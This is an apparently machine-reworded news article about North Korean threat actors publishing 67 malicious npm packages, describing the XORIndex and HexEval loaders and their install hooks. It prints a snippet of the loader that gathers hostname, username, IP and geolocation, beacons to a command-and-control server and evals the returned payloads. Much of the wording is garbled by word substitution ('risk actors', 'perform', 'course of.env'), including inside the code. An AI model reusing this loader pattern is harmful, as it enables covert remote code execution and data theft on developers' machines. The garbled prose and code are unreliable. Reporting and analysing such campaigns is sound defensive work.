North Korean risk actors have escalated their software program provide chain assaults with the deployment of 67 malicious npm packages that collectively garnered over 17,000 downloads earlier than detection.
This newest marketing campaign represents a big growth of the continuing “Contagious Interview” operation, introducing a beforehand unreported malware loader dubbed XORIndex alongside the prevailing HexEval Loader infrastructure.
The newly found XORIndex malware, named for its distinctive use of XOR-encoded strings and index-based obfuscation methods, demonstrates the risk actors’ continued evolution in growing refined evasion mechanisms.
The malicious packages infiltrated the npm ecosystem via 18 totally different accounts registered with 15 distinct e-mail addresses, with 27 packages remaining lively on the registry on the time of discovery.
Socket.dev analysts recognized this marketing campaign as a part of a broader North Korean cyber espionage effort focusing on builders, cryptocurrency holders, and people with entry to delicate credentials.
The XORIndex Loader operates as a multi-stage assault framework, initially gathering host metadata earlier than decoding and executing the BeaverTail second-stage malware, which subsequently references the InvisibleFerret backdoor for persistent entry.
Timeline of HexEval and XORIndex Loader campaigns (Supply – Socket.dev)
The marketing campaign’s infrastructure depends on hardcoded command and management endpoints hosted on respectable platforms like Vercel, using URLs comparable to and
This strategy permits the risk actors to take care of operational safety whereas leveraging trusted internet hosting companies to evade detection mechanisms.
The XORIndex Loader has amassed over 9,000 downloads between June and July 2025, working in parallel with the persevering with HexEval marketing campaign that has generated a further 8,000 downloads throughout newly found packages.
This dual-track strategy demonstrates the risk actors’ dedication to sustaining a number of assault vectors concurrently.
XORIndex An infection Mechanism and Code Execution
The XORIndex Loader’s an infection mechanism begins instantly upon bundle set up, leveraging Node.js post-install hooks to execute malicious code with out consumer interplay.
The malware employs a classy reconnaissance part, gathering complete system data together with hostname, username, exterior IP tackle, geolocation knowledge, and platform particulars earlier than establishing communication with command and management servers.
A consultant code snippet from the eth-auditlog bundle demonstrates the loader’s core performance:-
// Collects native telemetry (host/consumer/IP/geo/platform)
async perform gatherInfo() {
const ip = await publicIp.v4();
const geo = (await axios.get(`
return {
host: os.hostname(),
consumer: os.userInfo().username,
ip,
location: geo,
platform: os.platform()
};
}
// Sends beacon and executes risk actor-supplied JavaScript payloads
module.exports = async perform author() {
const data = await gatherInfo();
const model = course of.env.npm_package_version;
axios.publish(” { …data, model })
.then(res => {
eval(res.knowledge.s1); // Execute main payload
eval(res.knowledge.s2); // Execute optionally available secondary payload
});
};
The loader’s evolution from primary prototypes to classy malware demonstrates deliberate development in obfuscation methods, progressing from easy distant code execution capabilities to complete system profiling and multi-endpoint command rotation, positioning it as a formidable risk to software program provide chain safety.
Examine dwell malware conduct, hint each step of an assault, and make quicker, smarter safety choices -> Strive ANY.RUN now
